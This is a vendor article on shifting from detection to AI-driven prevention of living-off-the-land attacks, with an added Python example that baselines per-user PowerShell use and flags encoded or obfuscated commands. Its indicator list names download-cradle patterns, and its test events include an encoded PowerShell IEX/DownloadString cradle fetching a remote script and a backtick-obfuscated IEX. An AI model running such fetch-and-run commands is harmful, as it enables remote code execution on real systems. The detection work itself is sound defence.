Flipping the switch: 2026 will see a shift from reaction to prevention

January 7, 2026

Author: Martin Zugec, Technical Solutions Director, Bitdefender

New technologies, new pace: cybercriminals' skills are developing faster than ever. In 2026, companies will therefore undergo a fundamental change, away from purely reactive defence and towards proactive prevention. The trigger is the attackers themselves: they increasingly exploit vulnerabilities in internet-facing edge devices and rely on living-off-the-land (LOTL) techniques that are designed to slip past conventional endpoint protection unnoticed. Against this backdrop, IT security managers should spend the next twelve months building environments that are deliberately hostile to attackers.

Attackers have learned to use LOTL tools to bypass the detection mechanisms of traditional EDR and XDR, or to disable the EDR and XDR agents altogether early in the attack chain. Recent analyses of around 700,000 security incidents show that 84 per cent of attacks already involve LOTL techniques: instead of classic malware, attackers rely on legitimate applications and tools that are already present in the victim's environment. Because this makes malicious activity almost indistinguishable from normal user behaviour, companies need to realign their security models. Prevention-oriented approaches that dynamically reduce the attack surface, control access rights at a granular level and stop threats before they ever reach the detection layer are becoming a necessity.

It is not detection accuracy, but the attack surface itself that is becoming the central arena of conflict.

For years, security strategies rested on the assumption that detecting and responding as quickly as possible would limit the damage. That logic falls short once attackers no longer need malware and their behaviour is hardly distinguishable from that of a legitimate user. LOTL techniques let attackers operate undetected with native operating system tools, escalate privileges and move laterally through the network without triggering alerts from traditional endpoint detection and response (EDR) and extended detection and response (XDR) systems.

Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) are now mature and widely used. They are increasingly taken for granted rather than seen as a differentiating feature. Although they remain indispensable, they are no longer sufficient on their own.

This is because cybercriminals automate their own reconnaissance. They exploit newly published vulnerabilities within hours and use legitimate tools such as PowerShell, WMIC or Certutil to blend in with trustworthy activity. Because these actions leave no malware artefacts or suspicious binaries behind, detection has to rest on behaviour alone, and even advanced EDR and XDR platforms then generate large numbers of alerts with little informative value. Distinguishing real attacks from normal system behaviour becomes ever harder for security teams.

AI as the engine for adaptive prevention at machine speed

A defining and necessary trend for 2026 will therefore be the use of AI-powered, adaptive prevention systems. These continuously secure IT environments based on real user behaviour and up-to-date threat intelligence. While prevention controls were often considered rigid or restrictive in the past, modern AI makes them precise, dynamic and scalable. The system learns how individual employees use applications and system tools, adapts access rights to the everyday work requirements and resulting risk profile of each user or device, and blocks risky actions from the outset. For example, an administrator can deny access to PowerShell entirely for users who never use the tool. In practice the learned baseline has to account for scheduled tasks and management agents that launch PowerShell on a user's or the system's behalf, otherwise such a rule breaks legitimate automation.

For users who run PowerShell regularly for legitimate tasks, AI can allow their typical commands while rejecting encoded (for example Base64-encoded via -EncodedCommand) or obfuscated commands and commands whose context indicates malicious intent.
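The per-user rule described above, written out as an added example in Python. This is illustrative code for this page, not Bitdefender's product logic or any vendor's API. It learns which (user, parent process) pairs launch PowerShell during a baseline window from constructed Sysmon-style process-creation events, blocks launches with no baseline (a user who never uses PowerShell, or a familiar user launching it from an unusual parent such as Office), decodes -EncodedCommand payloads (PowerShell accepts any unambiguous prefix of the switch, so -e and -enc are caught too), and scores obfuscation and LOTL indicators. The user and host names, the event samples, the indicator weights and the block threshold are all assumptions chosen for the demonstration.

```python
"""Per-user PowerShell baseline plus encoded/obfuscated command check.

Added example for this page; not Bitdefender code. Users, parents, events,
indicator weights and BLOCK_THRESHOLD are constructed for the demonstration.
"""
import base64
import binascii
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    user: str      # account that launched the process, e.g. "CORP\\alice" (constructed)
    parent: str    # parent image name, e.g. "explorer.exe"
    image: str     # launched image name
    cmdline: str   # full command line as logged


POWERSHELL = {"powershell.exe", "pwsh.exe"}
MIN_BASELINE_LAUNCHES = 3   # assumption: fewer launches do not establish a habit
BLOCK_THRESHOLD = 4         # assumption: indicator score at which a launch is blocked

# (pattern, weight, label): weights are illustrative, not tuned on real data.
INDICATORS = [
    (re.compile(r"(?i)\biex\b|invoke-expression"), 2, "invoke-expression"),
    (re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest"), 2, "download cradle"),
    (re.compile(r"(?i)frombase64string|\[char\]|-join"), 2, "runtime decoding"),
    (re.compile(r"[A-Za-z]`[A-Za-z]"), 3, "backtick obfuscation"),
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1, "hidden window"),
    (re.compile(r"(?i)-nop\b|-noprofile"), 1, "no profile"),
    (re.compile(r"(?i)-ep\s+bypass|-executionpolicy\s+bypass"), 1, "execution policy bypass"),
]
CONCAT = re.compile(r"['\"]\s*\+\s*['\"]")   # e.g. 'Get-Pro' + 'cess'


def learn_baseline(events):
    """Set of (user, parent) pairs that launched PowerShell at least
    MIN_BASELINE_LAUNCHES times in the learning window. Keying on the parent
    keeps SYSTEM-run management agents separate from interactive use."""
    counts = Counter((e.user.lower(), e.parent.lower())
                     for e in events if e.image.lower() in POWERSHELL)
    return {key for key, n in counts.items() if n >= MIN_BASELINE_LAUNCHES}


def extract_encoded(cmdline):
    """Decoded script if the command line carries -EncodedCommand (any prefix
    of the switch, e.g. -e, -enc); "" if the payload is undecodable; None if absent."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            payload = tokens[i + 1].strip("'\"")
            try:   # PowerShell expects Base64 over UTF-16LE text
                return base64.b64decode(payload, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return ""
    return None


def score_command(text):
    """Sum indicator weights found in a (decoded) command line; return (score, hits)."""
    score, hits = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(text):
            score += weight
            hits.append(label)
    n_concat = len(CONCAT.findall(text))
    if n_concat:
        score += min(2, n_concat)
        hits.append(f"string concatenation x{n_concat}")
    return score, hits


def decide(event, baseline):
    """Return ("allow" | "block", reason) for one process-creation event."""
    if event.image.lower() not in POWERSHELL:
        return "allow", "not a PowerShell launch"
    if (event.user.lower(), event.parent.lower()) not in baseline:
        return "block", f"no PowerShell baseline for {event.user} via {event.parent}"
    decoded = extract_encoded(event.cmdline)
    text = event.cmdline if decoded is None else event.cmdline + " " + decoded
    score, hits = score_command(text)
    if decoded is not None:          # encoding itself is unusual for interactive admins
        score += 2
        hits.append("encoded command")
    verdict = "block" if score >= BLOCK_THRESHOLD else "allow"
    return verdict, f"score {score}: {', '.join(hits) or 'no indicators'}"


def encode_command(script):
    """Build an -EncodedCommand payload the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed learning window: alice administers from a shell, a management
# agent runs scripts as SYSTEM, bob never launches PowerShell.
LEARNING_EVENTS = [
    ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Service Spooler"),
    ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile -File C:\\ops\\rotate-logs.ps1"),
    ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -Command Get-EventLog -LogName System -Newest 20"),
    ProcEvent("NT AUTHORITY\\SYSTEM", "agent.exe", "powershell.exe", "powershell.exe -NonInteractive -File C:\\agent\\inventory.ps1"),
    ProcEvent("NT AUTHORITY\\SYSTEM", "agent.exe", "powershell.exe", "powershell.exe -NonInteractive -File C:\\agent\\inventory.ps1"),
    ProcEvent("NT AUTHORITY\\SYSTEM", "agent.exe", "powershell.exe", "powershell.exe -NonInteractive -File C:\\agent\\inventory.ps1"),
    ProcEvent("CORP\\bob", "explorer.exe", "winword.exe", "winword.exe /n"),
]

# Constructed events to police after the baseline is learned.
NEW_EVENTS = {
    "admin_routine": ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Service Spooler"),
    "never_uses_ps": ProcEvent("CORP\\bob", "explorer.exe", "powershell.exe", "powershell.exe -Command Get-Process"),
    "office_child": ProcEvent("CORP\\alice", "winword.exe", "powershell.exe", "powershell.exe -Command Get-Process"),
    "encoded_cradle": ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc "
                                + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")),
    "obfuscated": ProcEvent("CORP\\alice", "explorer.exe", "powershell.exe", "powershell.exe -w hidden -c \"I`EX ('Get-Pro' + 'cess')\""),
}


def run_demo():
    baseline = learn_baseline(LEARNING_EVENTS)
    return {name: decide(ev, baseline) for name, ev in NEW_EVENTS.items()}


if __name__ == "__main__":
    for name, (verdict, reason) in run_demo().items():
        print(f"{name:15} {verdict:5} {reason}")
```

Only the first event is allowed: alice's routine command scores 1 (-NoProfile). bob and alice-via-Word are blocked before any content inspection because no baseline exists for that user and parent, which is the "deny PowerShell to users who never use it" rule. The encoded download cradle is decoded and blocked on the cradle plus the encoding itself, and the backtick-split I`EX with string concatenation is blocked without being decoded at all. In production the weights would be learned rather than hand-set, and the baseline key would usually include the host as well.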

The result is a security architecture that adapts continuously. Attack vectors are closed at machine speed, and the scope for escalating privileges or moving laterally within the victim's network shrinks considerably. Because these systems operate autonomously and recognise patterns across the entire IT environment, preventive security proves more efficient than relying on human analysts who have to triage and work through large volumes of alerts by hand.

In 2026, proactive prevention will become the decisive discipline

Detection and response will remain indispensable. Increasingly, however, they are complemented by next-generation preventive technologies designed to stop attacks that abuse trust, such as LOTL techniques. These approaches help security teams remove unnecessary tools and excessive privileges and minimise lateral attack paths. They also blunt the repeatable, automated playbooks that attackers scale across many victims, because per-user and per-device rules mean no two systems respond in the same way. At the same time, granular detection and classification of risks reduces alert fatigue: teams can focus on the threats that matter while security controls adapt in real time to user behaviour.

Stay ahead of the threats – instead of chasing after them

Companies are better equipped for new attack methods once they stop assuming that detection alone can counter highly automated and covert attacks. Those who rely exclusively on reactive measures accept unnecessary risk and pit human reaction times against machine-speed attacks. Those who reduce the attack surface, remove unnecessary tools, consistently control data access and use adaptive prevention mechanisms lay the foundation for more resilient IT in 2026.

Image: Martin Zugec, Technical Solutions Director, Bitdefender. Image source: Bitdefender.
